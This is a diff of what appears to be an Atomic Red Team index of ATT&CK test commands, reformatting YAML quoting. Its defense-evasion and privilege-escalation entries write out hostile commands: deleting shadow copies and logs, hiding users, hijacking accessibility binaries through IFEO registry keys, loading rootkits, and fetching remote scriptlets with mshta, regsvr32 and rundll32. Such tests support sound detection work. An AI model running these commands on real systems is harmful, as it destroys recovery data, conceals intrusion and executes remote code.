@@ -4476,62 +4643,77 @@ defense-evasion:
type nul > f
type nul > g
- name: Delete a single file - cmd
description: |
Delete a single file from the temporary directory using cmd.exe
description: 'Delete a single file from the temporary directory using cmd.exe
'
supported_platforms:
- windows
executor:
name: command_prompt
command: |
del /f %TEMP%\victim-files-cmd\a
command: 'del /f %TEMP%\victim-files-cmd\a
'
- name: Delete an entire folder - cmd
description: |
Recursively delete the temporary directory and all files contained within it using cmd.exe
description: 'Recursively delete the temporary directory and all files contained
within it using cmd.exe
'
supported_platforms:
- windows
executor:
name: command_prompt
command: |
del /f /S %TEMP%\victim-files-cmd
command: 'del /f /S %TEMP%\victim-files-cmd
'
- name: Delete a single file - ps
description: |
Delete a single file from the temporary directory using Powershell
description: 'Delete a single file from the temporary directory using Powershell
'
supported_platforms:
- windows
executor:
name: powershell
command: |
Remove-Item -path %TEMP%\victim-files-ps\a
command: 'Remove-Item -path %TEMP%\victim-files-ps\a
'
- name: Delete an entire folder - ps
description: |
Recursively delete the temporary directory and all files contained within it using Powershell
description: 'Recursively delete the temporary directory and all files contained
within it using Powershell
'
supported_platforms:
- windows
executor:
name: powershell
command: |
Remove-Item -path %TEMP%\victim-files-ps -recurse
command: 'Remove-Item -path %TEMP%\victim-files-ps -recurse
'
- name: Delete VSS - vssadmin
description: |
Delete all volume shadow copies with vssadmin.exe
description: 'Delete all volume shadow copies with vssadmin.exe
'
supported_platforms:
- windows
executor:
name: command_prompt
command: |
vssadmin.exe Delete Shadows /All /Quiet
command: 'vssadmin.exe Delete Shadows /All /Quiet
'
- name: Delete VSS - wmic
description: |
Delete all volume shadow copies with wmic
description: 'Delete all volume shadow copies with wmic
'
supported_platforms:
- windows
executor:
name: command_prompt
command: |
wmic shadowcopy delete
command: 'wmic shadowcopy delete
'
- name: bcdedit
description: |
xxx
description: 'xxx
'
supported_platforms:
- windows
executor:
@@ -4540,14 +4722,16 @@ defense-evasion:
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
- name: wbadmin
description: |
xxx
description: 'xxx
'
supported_platforms:
- windows
executor:
name: command_prompt
command: |
wbdadmin delete catalog -quiet
command: 'wbdadmin delete catalog -quiet
'
T1144:
technique:
name: Gatekeeper Bypass
@@ -4617,8 +4801,9 @@ defense-evasion:
identifier: T1144
atomic_tests:
- name: Gatekeeper Bypass
description: |
Gatekeeper Bypass via command line
description: 'Gatekeeper Bypass via command line
'
supported_platforms:
- macos
input_arguments:
@@ -4676,8 +4861,9 @@ defense-evasion:
identifier: T1148
atomic_tests:
- name: Disable history collection
description: |
Disables history collection in shells
description: 'Disables history collection in shells
'
supported_platforms:
- linux
- macos
@@ -4692,8 +4878,9 @@ defense-evasion:
export HISTCONTROL=ignoreboth
ls #{evil_command}
- name: Mac HISTCONTROL
description: |
xxx
description: 'xxx
'
supported_platforms:
- macos
- linux
@@ -4784,8 +4971,9 @@ defense-evasion:
identifier: T1158
atomic_tests:
- name: Create a hidden file in a hidden directory
description: |
Creates a hidden file inside a hidden directory
description: 'Creates a hidden file inside a hidden directory
'
supported_platforms:
- linux
- macos
@@ -4795,17 +4983,21 @@ defense-evasion:
mkdir .hidden-directory
echo "this file is hidden" > .hidden-directory/.hidden-file
- name: Mac Hidden file
description: |
TODO
description: 'TODO
'
supported_platforms:
- macos
executor:
name: sh
command: |
sudo xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00 40 00 FF FF FF FF 00 00"
command: 'sudo xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00
00 00 40 00 FF FF FF FF 00 00"
'
- name: Hidden file
description: |
mv file to a .file
description: 'mv file to a .file
'
supported_platforms:
- macos
- linux
@@ -4820,38 +5012,46 @@ defense-evasion:
default: "/tmp/evil"
executor:
name: sh
command: |
mv #{filename} .#{output_filename}
command: 'mv #{filename} .#{output_filename}
'
- name: Hidden files
description: |
Requieres Apple Dev Tools
description: 'Requieres Apple Dev Tools
'
supported_platforms:
- macos
executor:
name: sh
command: |
setfile -a V #{filename}
command: 'setfile -a V #{filename}
'
- name: Hide a Directory
description: |
xxx
description: 'xxx
'
supported_platforms:
- macos
executor:
name: sh
command: |
chflags hidden #{filename}
command: 'chflags hidden #{filename}
'
- name: Show all hidden files
description: |
xxx
description: 'xxx
'
supported_platforms:
- macos
executor:
name: sh
command: |
defaults write com.apple.finder AppleShowAllFiles YES
command: 'defaults write com.apple.finder AppleShowAllFiles YES
'
- name: Create visible Directories
description: |
xxx
description: 'xxx
'
supported_platforms:
- macos
- linux
@@ -4863,8 +5063,9 @@ defense-evasion:
ls
ls visible-directory
- name: Create hidden directories and files
description: |
xxx
description: 'xxx
'
supported_platforms:
- macos
- linux
@@ -4876,8 +5077,10 @@ defense-evasion:
ls -la
ls -la .hidden-directory
- name: Create ADS command prompt
description: |
Create an Alternate Data Stream with the command prompt. Write access is required.
description: 'Create an Alternate Data Stream with the command prompt. Write
access is required.
'
supported_platforms:
- windows
input_arguments:
@@ -4896,8 +5099,10 @@ defense-evasion:
echo "test" > :#{ads_filename}
dir /s /r | find ":$DATA"
- name: Create ADS PowerShell
description: |
Create an Alternate Data Stream with PowerShell. Write access is required.
description: 'Create an Alternate Data Stream with PowerShell. Write access
is required.
'
supported_platforms:
- windows
input_arguments:
@@ -4958,8 +5163,9 @@ defense-evasion:
identifier: T1147
atomic_tests:
- name: Hidden Users
description: |
Add a hidden user on MacOS
description: 'Add a hidden user on MacOS
'
supported_platforms:
- macos
input_arguments:
@@ -4969,8 +5175,9 @@ defense-evasion:
default: APT
executor:
name: sh
command: |
sudo dscl . -create /Users/#{user_name} UniqueID 333
command: 'sudo dscl . -create /Users/#{user_name} UniqueID 333
'
T1183:
technique:
name: Image File Execution Options Injection
@@ -5043,8 +5250,9 @@ defense-evasion:
identifier: T1183
atomic_tests:
- name: IFEO Add Debugger
description: |
TODO
description: 'TODO
'
supported_platforms:
- windows
input_arguments:
@@ -5058,11 +5266,14 @@ defense-evasion:
default: cmd.exe
executor:
name: command_prompt
command: |
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}"
command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}"
'
- name: IFEO GLobal Flags
description: |
Leverage Global Flags Settings
description: 'Leverage Global Flags Settings
'
supported_platforms:
- windows
input_arguments:
@@ -5076,8 +5287,14 @@ defense-evasion:
default: cmd.exe
executor:
name: command_prompt
command: |
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v GlobalFlag /t REG_DWORD /d 512 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v ReportingMode /t REG_DWORD /d 1 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess /d "#{payload_binary}"
command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_binary}" /v GlobalFlag /t REG_DWORD /d 512
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}"
/v ReportingMode /t REG_DWORD /d 1 REG ADD "HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess
/d "#{payload_binary}"
'
T1070:
technique:
name: Indicator Removal on Host
@@ -5120,8 +5337,9 @@ defense-evasion:
identifier: T1070
atomic_tests:
- name: Clear Logs
description: |
Clear Windows Event Logs
description: 'Clear Windows Event Logs
'
supported_platforms:
- windows
input_arguments:
@@ -5131,20 +5349,25 @@ defense-evasion:
default: System
executor:
name: command_prompt
command: |
wevtutil cl #{log_name}
command: 'wevtutil cl #{log_name}
'
- name: FSUtil
description: |
Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume.
description: 'Manages the update sequence number (USN) change journal, which
provides a persistent log of all changes made to files on the volume.
'
supported_platforms:
- windows
executor:
name: command_prompt
command: |
fsutil usn deletejournal /D C:
command: 'fsutil usn deletejournal /D C:
'
- name: rm -rf
description: |
Delete system and audit logs
description: 'Delete system and audit logs
'
supported_platforms:
- macos
- linux
@@ -5356,8 +5579,9 @@ defense-evasion:
identifier: T1130
atomic_tests:
- name: Install root CA on CentOS/RHEL
description: |
Creates a root CA with openssl
description: 'Creates a root CA with openssl
'
supported_platforms:
- linux
input_arguments:
@@ -5443,8 +5667,9 @@ defense-evasion:
identifier: T1118
atomic_tests:
- name: InstallUtil uninstall method call
description: |
Executes the Uninstall Method
description: 'Executes the Uninstall Method
'
supported_platforms:
- windows
input_arguments:
@@ -5518,14 +5743,16 @@ defense-evasion:
identifier: T1152
atomic_tests:
- name: Launchctl
description: |
Utilize launchctl
description: 'Utilize launchctl
'
supported_platforms:
- macos
executor:
name: sh
command: |
launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator
command: 'launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator
'
T1036:
technique:
name: Masquerading
@@ -5607,8 +5834,10 @@ defense-evasion:
identifier: T1036
atomic_tests:
- name: Masquerading as Windows LSASS process
description: |
Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsass.exe.
description: 'Copies cmd.exe, renames it, and launches it to masquerade as an
instance of lsass.exe.
'
supported_platforms:
- windows
executor:
@@ -5617,8 +5846,10 @@ defense-evasion:
cmd.exe /c copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe
cmd.exe /c %SystemRoot%\Temp\lsass.exe
- name: Masquerading as Linux crond process.
description: |
Copies sh process, renames it as crond, and executes it to masquerade as the cron daemon.
description: 'Copies sh process, renames it as crond, and executes it to masquerade
as the cron daemon.
'
supported_platforms:
- linux
executor:
@@ -5689,14 +5920,18 @@ defense-evasion:
identifier: T1112
atomic_tests:
- name: Modify Registry of Current User Profile - cmd
description: |
Modify the registry of the currently logged in user using reg.exe cia cmd console
description: 'Modify the registry of the currently logged in user using reg.exe
cia cmd console
'
supported_platforms:
- windows
executor:
name: command_prompt
command: |
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f
command: 'reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
/t REG_DWORD /v HideFileExt /d 1 /f
'
- name: Modify Registry of Local Machine - cmd
description: |
Modify the Local Machine registry RUN key to change Windows Defender executable that should be ran on startup. This should only be possible when
@@ -5705,11 +5940,15 @@ defense-evasion:
- windows
executor:
name: command_prompt
command: |
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d {some_other_executable} /f
command: 'reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
/t REG_EXPAND_SZ /v SecurityHealth /d {some_other_executable} /f
'
- name: Modify Registry of Another User Profile
description: |
Modify a registry key of each user profile not currently loaded on the machine using both powershell and cmd line tools.
description: 'Modify a registry key of each user profile not currently loaded
on the machine using both powershell and cmd line tools.
'
supported_platforms:
- windows
executor:
@@ -5837,8 +6076,9 @@ defense-evasion:
identifier: T1170
atomic_tests:
- name: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject
description: |
Test execution of a remote script using mshta.exe
description: 'Test execution of a remote script using mshta.exe
'
supported_platforms:
- windows
input_arguments:
@@ -5848,8 +6088,9 @@ defense-evasion:
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/mshta.sct
executor:
name: command_prompt
command: |
mshta.exe javascript:a=(GetObject('script:#{file_url}')).Exec();close();
command: 'mshta.exe javascript:a=(GetObject(''script:#{file_url}'')).Exec();close();
'
T1096:
technique:
name: NTFS File Attributes
@@ -6012,8 +6253,9 @@ defense-evasion:
identifier: T1126
atomic_tests:
- name: Add Network Share
description: |
Add a Network Share utilizing the command_prompt
description: 'Add a Network Share utilizing the command_prompt
'
supported_platforms:
- windows
input_arguments:
@@ -6027,8 +6269,9 @@ defense-evasion:
net use c: #{share_name}
net share test=#{share_name} /REMARK:"test share" /CACHE:No
- name: Remove Network Share
description: |
Removes a Network Share utilizing the command_prompt
description: 'Removes a Network Share utilizing the command_prompt
'
supported_platforms:
- windows
input_arguments:
@@ -6038,11 +6281,13 @@ defense-evasion:
default: "\\\\test\\share"
executor:
name: command_prompt
command: |
net share #{share_name} /delete
command: 'net share #{share_name} /delete
'
- name: Remove Network Share PowerShell
description: |
Removes a Network Share utilizing PowerShell
description: 'Removes a Network Share utilizing PowerShell
'
supported_platforms:
- windows
input_arguments:
@@ -6169,8 +6414,10 @@ defense-evasion:
identifier: T1027
atomic_tests:
- name: Decode base64 Data into Script
description: |
Creates a base64-encoded data file and decodes it into an executable shell script
description: 'Creates a base64-encoded data file and decodes it into an executable
shell script
'
supported_platforms:
- macos
- linux
@@ -6244,8 +6491,9 @@ defense-evasion:
identifier: T1150
atomic_tests:
- name: Plist Modification
description: |
TODO
description: 'TODO
'
supported_platforms:
- macos
executor:
@@ -6414,8 +6662,9 @@ defense-evasion:
identifier: T1055
atomic_tests:
- name: Process Injection via mavinject.exe
description: |
Windows 10 Utility To Inject DLLS
description: 'Windows 10 Utility To Inject DLLS
'
supported_platforms:
- windows
input_arguments:
@@ -6429,11 +6678,13 @@ defense-evasion:
default: "$pid"
executor:
name: powershell
command: |
mavinject $pid /INJECTRUNNING #{dll_payload}
command: 'mavinject $pid /INJECTRUNNING #{dll_payload}
'
- name: Process Injection via PowerSploit
description: |
PowerShell Injection using [PowerSploit Invoke-DLLInjection](https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-DllInjection.ps1)
description: 'PowerShell Injection using [PowerSploit Invoke-DLLInjection](https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-DllInjection.ps1)
'
supported_platforms:
- windows
input_arguments:
@@ -6447,8 +6698,9 @@ defense-evasion:
default: "$pid"
executor:
name: powershell
command: |
Invoke-DllInjection.ps1 -ProcessID #{process_id} -Dll #{dll_payload}
command: 'Invoke-DllInjection.ps1 -ProcessID #{process_id} -Dll #{dll_payload}
'
T1121:
technique:
name: Regsvcs/Regasm
@@ -6514,8 +6766,9 @@ defense-evasion:
identifier: T1121
atomic_tests:
- name: Regasm Uninstall Method Call Test
description: |
Executes the Uninstall Method, No Admin Rights Required
description: 'Executes the Uninstall Method, No Admin Rights Required
'
supported_platforms:
- windows
input_arguments:
@@ -6534,8 +6787,10 @@ defense-evasion:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{file_name}
del #{file_name}
- name: Regsvs Uninstall Method Call Test
description: |
Executes the Uninstall Method, No Admin Rights Required, Requires SNK
description: 'Executes the Uninstall Method, No Admin Rights Required, Requires
SNK
'
supported_platforms:
- windows
input_arguments:
@@ -6635,8 +6890,10 @@ defense-evasion:
identifier: T1117
atomic_tests:
- name: Regsvr32 local COM scriptlet execution
description: |
Regsvr32.exe is a command-line program used to register and unregister OLE controls
description: 'Regsvr32.exe is a command-line program used to register and unregister
OLE controls
'
supported_platforms:
- windows
input_arguments:
@@ -6646,11 +6903,14 @@ defense-evasion:
default: C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct
executor:
name: command_prompt
command: |
regsvr32.exe /s /u /i:#{filename} scrobj.dll
command: 'regsvr32.exe /s /u /i:#{filename} scrobj.dll
'
- name: Regsvr32 remote COM scriptlet execution
description: |
Regsvr32.exe is a command-line program used to register and unregister OLE controls
description: 'Regsvr32.exe is a command-line program used to register and unregister
OLE controls
'
supported_platforms:
- windows
input_arguments:
@@ -6660,11 +6920,14 @@ defense-evasion:
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct
executor:
name: command_prompt
command: |
regsvr32.exe /s /u /i:#{url} scrobj.dll
command: 'regsvr32.exe /s /u /i:#{url} scrobj.dll
'
- name: Regsvr32 local DLL execution
description: |
Regsvr32.exe is a command-line program used to register and unregister OLE controls
description: 'Regsvr32.exe is a command-line program used to register and unregister
OLE controls
'
supported_platforms:
- windows
input_arguments:
@@ -6674,8 +6937,10 @@ defense-evasion:
default: C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll
executor:
name: command_prompt
command: |
"IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s #{dll_name}) ELSE ( regsvr32.exe /s #{dll_name} )"
command: '"IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe
/s #{dll_name}) ELSE ( regsvr32.exe /s #{dll_name} )"
'
T1014:
technique:
name: Rootkit
@@ -6745,8 +7010,9 @@ defense-evasion:
identifier: T1014
atomic_tests:
- name: Loadable Kernel Module based Rootkit
description: |
Loadable Kernel Module based Rootkit
description: 'Loadable Kernel Module based Rootkit
'
supported_platforms:
- linux
input_arguments:
@@ -6756,11 +7022,13 @@ defense-evasion:
default: Module.ko
executor:
name: sh
command: |
sudo insmod #{rootkit_file}
command: 'sudo insmod #{rootkit_file}
'
- name: Loadable Kernel Module based Rootkit
description: |
Loadable Kernel Module based Rootkit
description: 'Loadable Kernel Module based Rootkit
'
supported_platforms:
- linux
input_arguments:
@@ -6770,17 +7038,20 @@ defense-evasion:
default: Module.ko
executor:
name: sh
command: |
sudo modprobe #{rootkit_file}
command: 'sudo modprobe #{rootkit_file}
'
- name: LD_PRELOAD based Rootkit
description: |
LD_PRELOAD based Rootkit
description: 'LD_PRELOAD based Rootkit
'
supported_platforms:
- linux
executor:
name: sh
command: |
export LD_PRELOAD=$PWD/#{rootkit_file}
command: 'export LD_PRELOAD=$PWD/#{rootkit_file}
'
- name: Windows Signed Driver Rootkit Test
description: |
This test exploits a signed driver to execute code in Kernel.
@@ -6800,8 +7071,9 @@ defense-evasion:
default: C:\Drivers\driver.sys
executor:
name: command_prompt
command: |
puppetstrings #{driver_path}
command: 'puppetstrings #{driver_path}
'
T1085:
technique:
name: Rundll32
@@ -6868,8 +7140,9 @@ defense-evasion:
identifier: T1085
atomic_tests:
- name: Rundll32 execute JavaScript Remote Payload With GetObject
description: |
Test execution of a remote script using rundll32.exe
description: 'Test execution of a remote script using rundll32.exe
'
supported_platforms:
- windows
input_arguments:
@@ -6879,8 +7152,9 @@ defense-evasion:
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/T1085.sct
executor:
name: command_prompt
command: |
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();"
command: 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();"
'
T1064:
technique:
name: Scripting
@@ -6954,8 +7228,9 @@ defense-evasion:
identifier: T1064
atomic_tests:
- name: Create and Execute Bash Shell Script
description: |
Creates and executes a simple bash script.
description: 'Creates and executes a simple bash script.
'
supported_platforms:
- macos
- linux
@@ -7029,8 +7304,10 @@ defense-evasion:
identifier: T1216
atomic_tests:
- name: PubPrn.vbs Signed Script Bypass
description: |
Executes the signed PubPrn.vbs script with options to download and execute an arbitrary payload.
description: 'Executes the signed PubPrn.vbs script with options to download
and execute an arbitrary payload.
'
supported_platforms:
- windows
input_arguments:
@@ -7040,8 +7317,10 @@ defense-evasion:
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct
executor:
name: command_prompt
command: |
cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:#{remote_payload}"
command: 'cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
localhost "script:#{remote_payload}"
'
T1151:
technique:
name: Space after Filename
@@ -7098,8 +7377,9 @@ defense-evasion:
identifier: T1151
atomic_tests:
- name: Space After Filename
description: |
Space After Filename
description: 'Space After Filename
'
supported_platforms:
- macos
executor:
@@ -7156,8 +7436,9 @@ defense-evasion:
identifier: T1099
atomic_tests:
- name: Set a file's access timestamp
description: |
Stomps on the access timestamp of a file
description: 'Stomps on the access timestamp of a file
'
supported_platforms:
- linux
- macos
@@ -7167,11 +7448,13 @@ defense-evasion:
type: Path
executor:
name: sh
command: |
touch -a -t 197001010000.00 #{target_filename}
command: 'touch -a -t 197001010000.00 #{target_filename}
'
- name: Set a file's modification timestamp
description: |
Stomps on the modification timestamp of a file
description: 'Stomps on the modification timestamp of a file
'
supported_platforms:
- linux
- macos
@@ -7181,8 +7464,9 @@ defense-evasion:
type: Path
executor:
name: sh
command: |
touch -m -t 197001010000.00 #{target_filename}
command: 'touch -m -t 197001010000.00 #{target_filename}
'
- name: Set a file's creation timestamp
description: |
Stomps on the create timestamp of a file
@@ -7348,8 +7632,9 @@ defense-evasion:
identifier: T1127
atomic_tests:
- name: MSBuild Bypass Using Inline Tasks
description: |
Executes the code in a project file using. C# Example
description: 'Executes the code in a project file using. C# Example
'
supported_platforms:
- windows
input_arguments:
@@ -7359,11 +7644,15 @@ defense-evasion:
default: T1127.csproj
executor:
name: command_prompt
command: |
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #{filename}
command: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #{filename}
'
- name: MSXSL Bypass using local files
description: |
Executes the code specified within a XSL script tag during XSL transformation using a local payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
description: 'Executes the code specified within a XSL script tag during XSL
transformation using a local payload. Requires download of MSXSL from Microsoft
at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
'
supported_platforms:
- windows
input_arguments:
@@ -7377,11 +7666,15 @@ defense-evasion:
default: C:\AtomicRedTeam\atomics\T1127\src\msxsl-script.xsl
executor:
name: command_prompt
command: |
C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
command: 'C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
'
- name: MSXSL Bypass using remote files
description: |
Executes the code specified within a XSL script tag during XSL transformation using a remote payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
description: 'Executes the code specified within a XSL script tag during XSL
transformation using a remote payload. Requires download of MSXSL from Microsoft
at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
'
supported_platforms:
- windows
input_arguments:
@@ -7395,8 +7688,9 @@ defense-evasion:
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1127/src/msxsl-script.xsl
executor:
name: command_prompt
command: |
C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
command: 'C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
'
privilege-escalation:
T1134:
technique:
@@ -7622,8 +7916,9 @@ privilege-escalation:
identifier: T1015
atomic_tests:
- name: Attaches Command Prompt As Debugger To Process - osk
description: |
This allows adversaries to execute the attached process
description: 'This allows adversaries to execute the attached process
'
supported_platforms:
- windows
input_arguments:
@@ -7633,11 +7928,15 @@ privilege-escalation:
default: osk.exe
executor:
name: command_prompt
command: |
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
'
- name: Attaches Command Prompt As Debugger To Process - sethc
description: |
This allows adversaries to execute the attached process
description: 'This allows adversaries to execute the attached process
'
supported_platforms:
- windows
input_arguments:
@@ -7647,11 +7946,15 @@ privilege-escalation:
default: sethc.exe
executor:
name: command_prompt
command: |
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
'
- name: Attaches Command Prompt As Debugger To Process - utilman
description: |
This allows adversaries to execute the attached process
description: 'This allows adversaries to execute the attached process
'
supported_platforms:
- windows
input_arguments:
@@ -7661,11 +7964,15 @@ privilege-escalation:
default: utilman.exe
executor:
name: command_prompt
command: |
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
'
- name: Attaches Command Prompt As Debugger To Process - magnify
description: |
This allows adversaries to execute the attached process
description: 'This allows adversaries to execute the attached process
'
supported_platforms:
- windows
input_arguments:
@@ -7675,11 +7982,15 @@ privilege-escalation:
default: magnify.exe
executor:
name: command_prompt
command: |
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
'
- name: Attaches Command Prompt As Debugger To Process - narrator
description: |
This allows adversaries to execute the attached process
description: 'This allows adversaries to execute the attached process
'
supported_platforms:
- windows
input_arguments:
@@ -7689,11 +8000,15 @@ privilege-escalation:
default: narrator.exe
executor:
name: command_prompt
command: |
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
'
- name: Attaches Command Prompt As Debugger To Process - DisplaySwitch
description: |
This allows adversaries to execute the attached process
description: 'This allows adversaries to execute the attached process
'
supported_platforms:
- windows
input_arguments:
@@ -7703,11 +8018,15 @@ privilege-escalation:
default: DisplaySwitch.exe
executor:
name: command_prompt
command: |
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
'
- name: Attaches Command Prompt As Debugger To Process - AtBroker
description: |
This allows adversaries to execute the attached process
description: 'This allows adversaries to execute the attached process
'
supported_platforms:
- windows
input_arguments:
@@ -7717,8 +8036,11 @@ privilege-escalation:
default: atbroker.exe
executor:
name: command_prompt
command: |
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
'
'':
technique:
name: Web Shell
@@ -7860,8 +8182,10 @@ privilege-escalation:
identifier: T1103
atomic_tests:
- name: Install AppInit Shim
description: |
AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded into each user mode process on the system
description: 'AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs
to be loaded into each user mode process on the system
'
supported_platforms:
- windows
input_arguments:
@@ -7871,8 +8195,9 @@ privilege-escalation:
default: T1103.reg
executor:
name: command_prompt
command: |
reg.exe import #{registry_file}
command: 'reg.exe import #{registry_file}
'
T1138:
technique:
name: Application Shimming
@@ -7942,14 +8267,16 @@ privilege-escalation:
identifier: T1138
atomic_tests:
- name: Application Shim Installation
description: |
This test injects a DLL into a custom application
description: 'This test injects a DLL into a custom application
'
supported_platforms:
- windows
executor:
name: command_prompt
command: |
sdbinst.exe AtomicShimx86.sdb
command: 'sdbinst.exe AtomicShimx86.sdb
'
T1088:
technique:
name: Bypass User Account Control
@@ -8059,8 +8386,10 @@ privilege-escalation:
identifier: T1088
atomic_tests:
- name: Bypass UAC using Event Viewer
description: |
Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
description: 'Bypasses User Account Control using Event Viewer and a relevant
Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
'
supported_platforms:
- windows
input_arguments:
@@ -8192,8 +8521,9 @@ privilege-escalation:
identifier: T1179
atomic_tests:
- name: Hook PowerShell TLS Encrypt/Decrypt Messages
description: |
Hooks functions in PowerShell to read TLS Communications
description: 'Hooks functions in PowerShell to read TLS Communications
'
supported_platforms:
- windows
input_arguments:
@@ -8282,8 +8612,9 @@ privilege-escalation:
identifier: T1183
atomic_tests:
- name: IFEO Add Debugger
description: |
TODO
description: 'TODO
'
supported_platforms:
- windows
input_arguments:
@@ -8297,11 +8628,14 @@ privilege-escalation:
default: cmd.exe
executor:
name: command_prompt
command: |
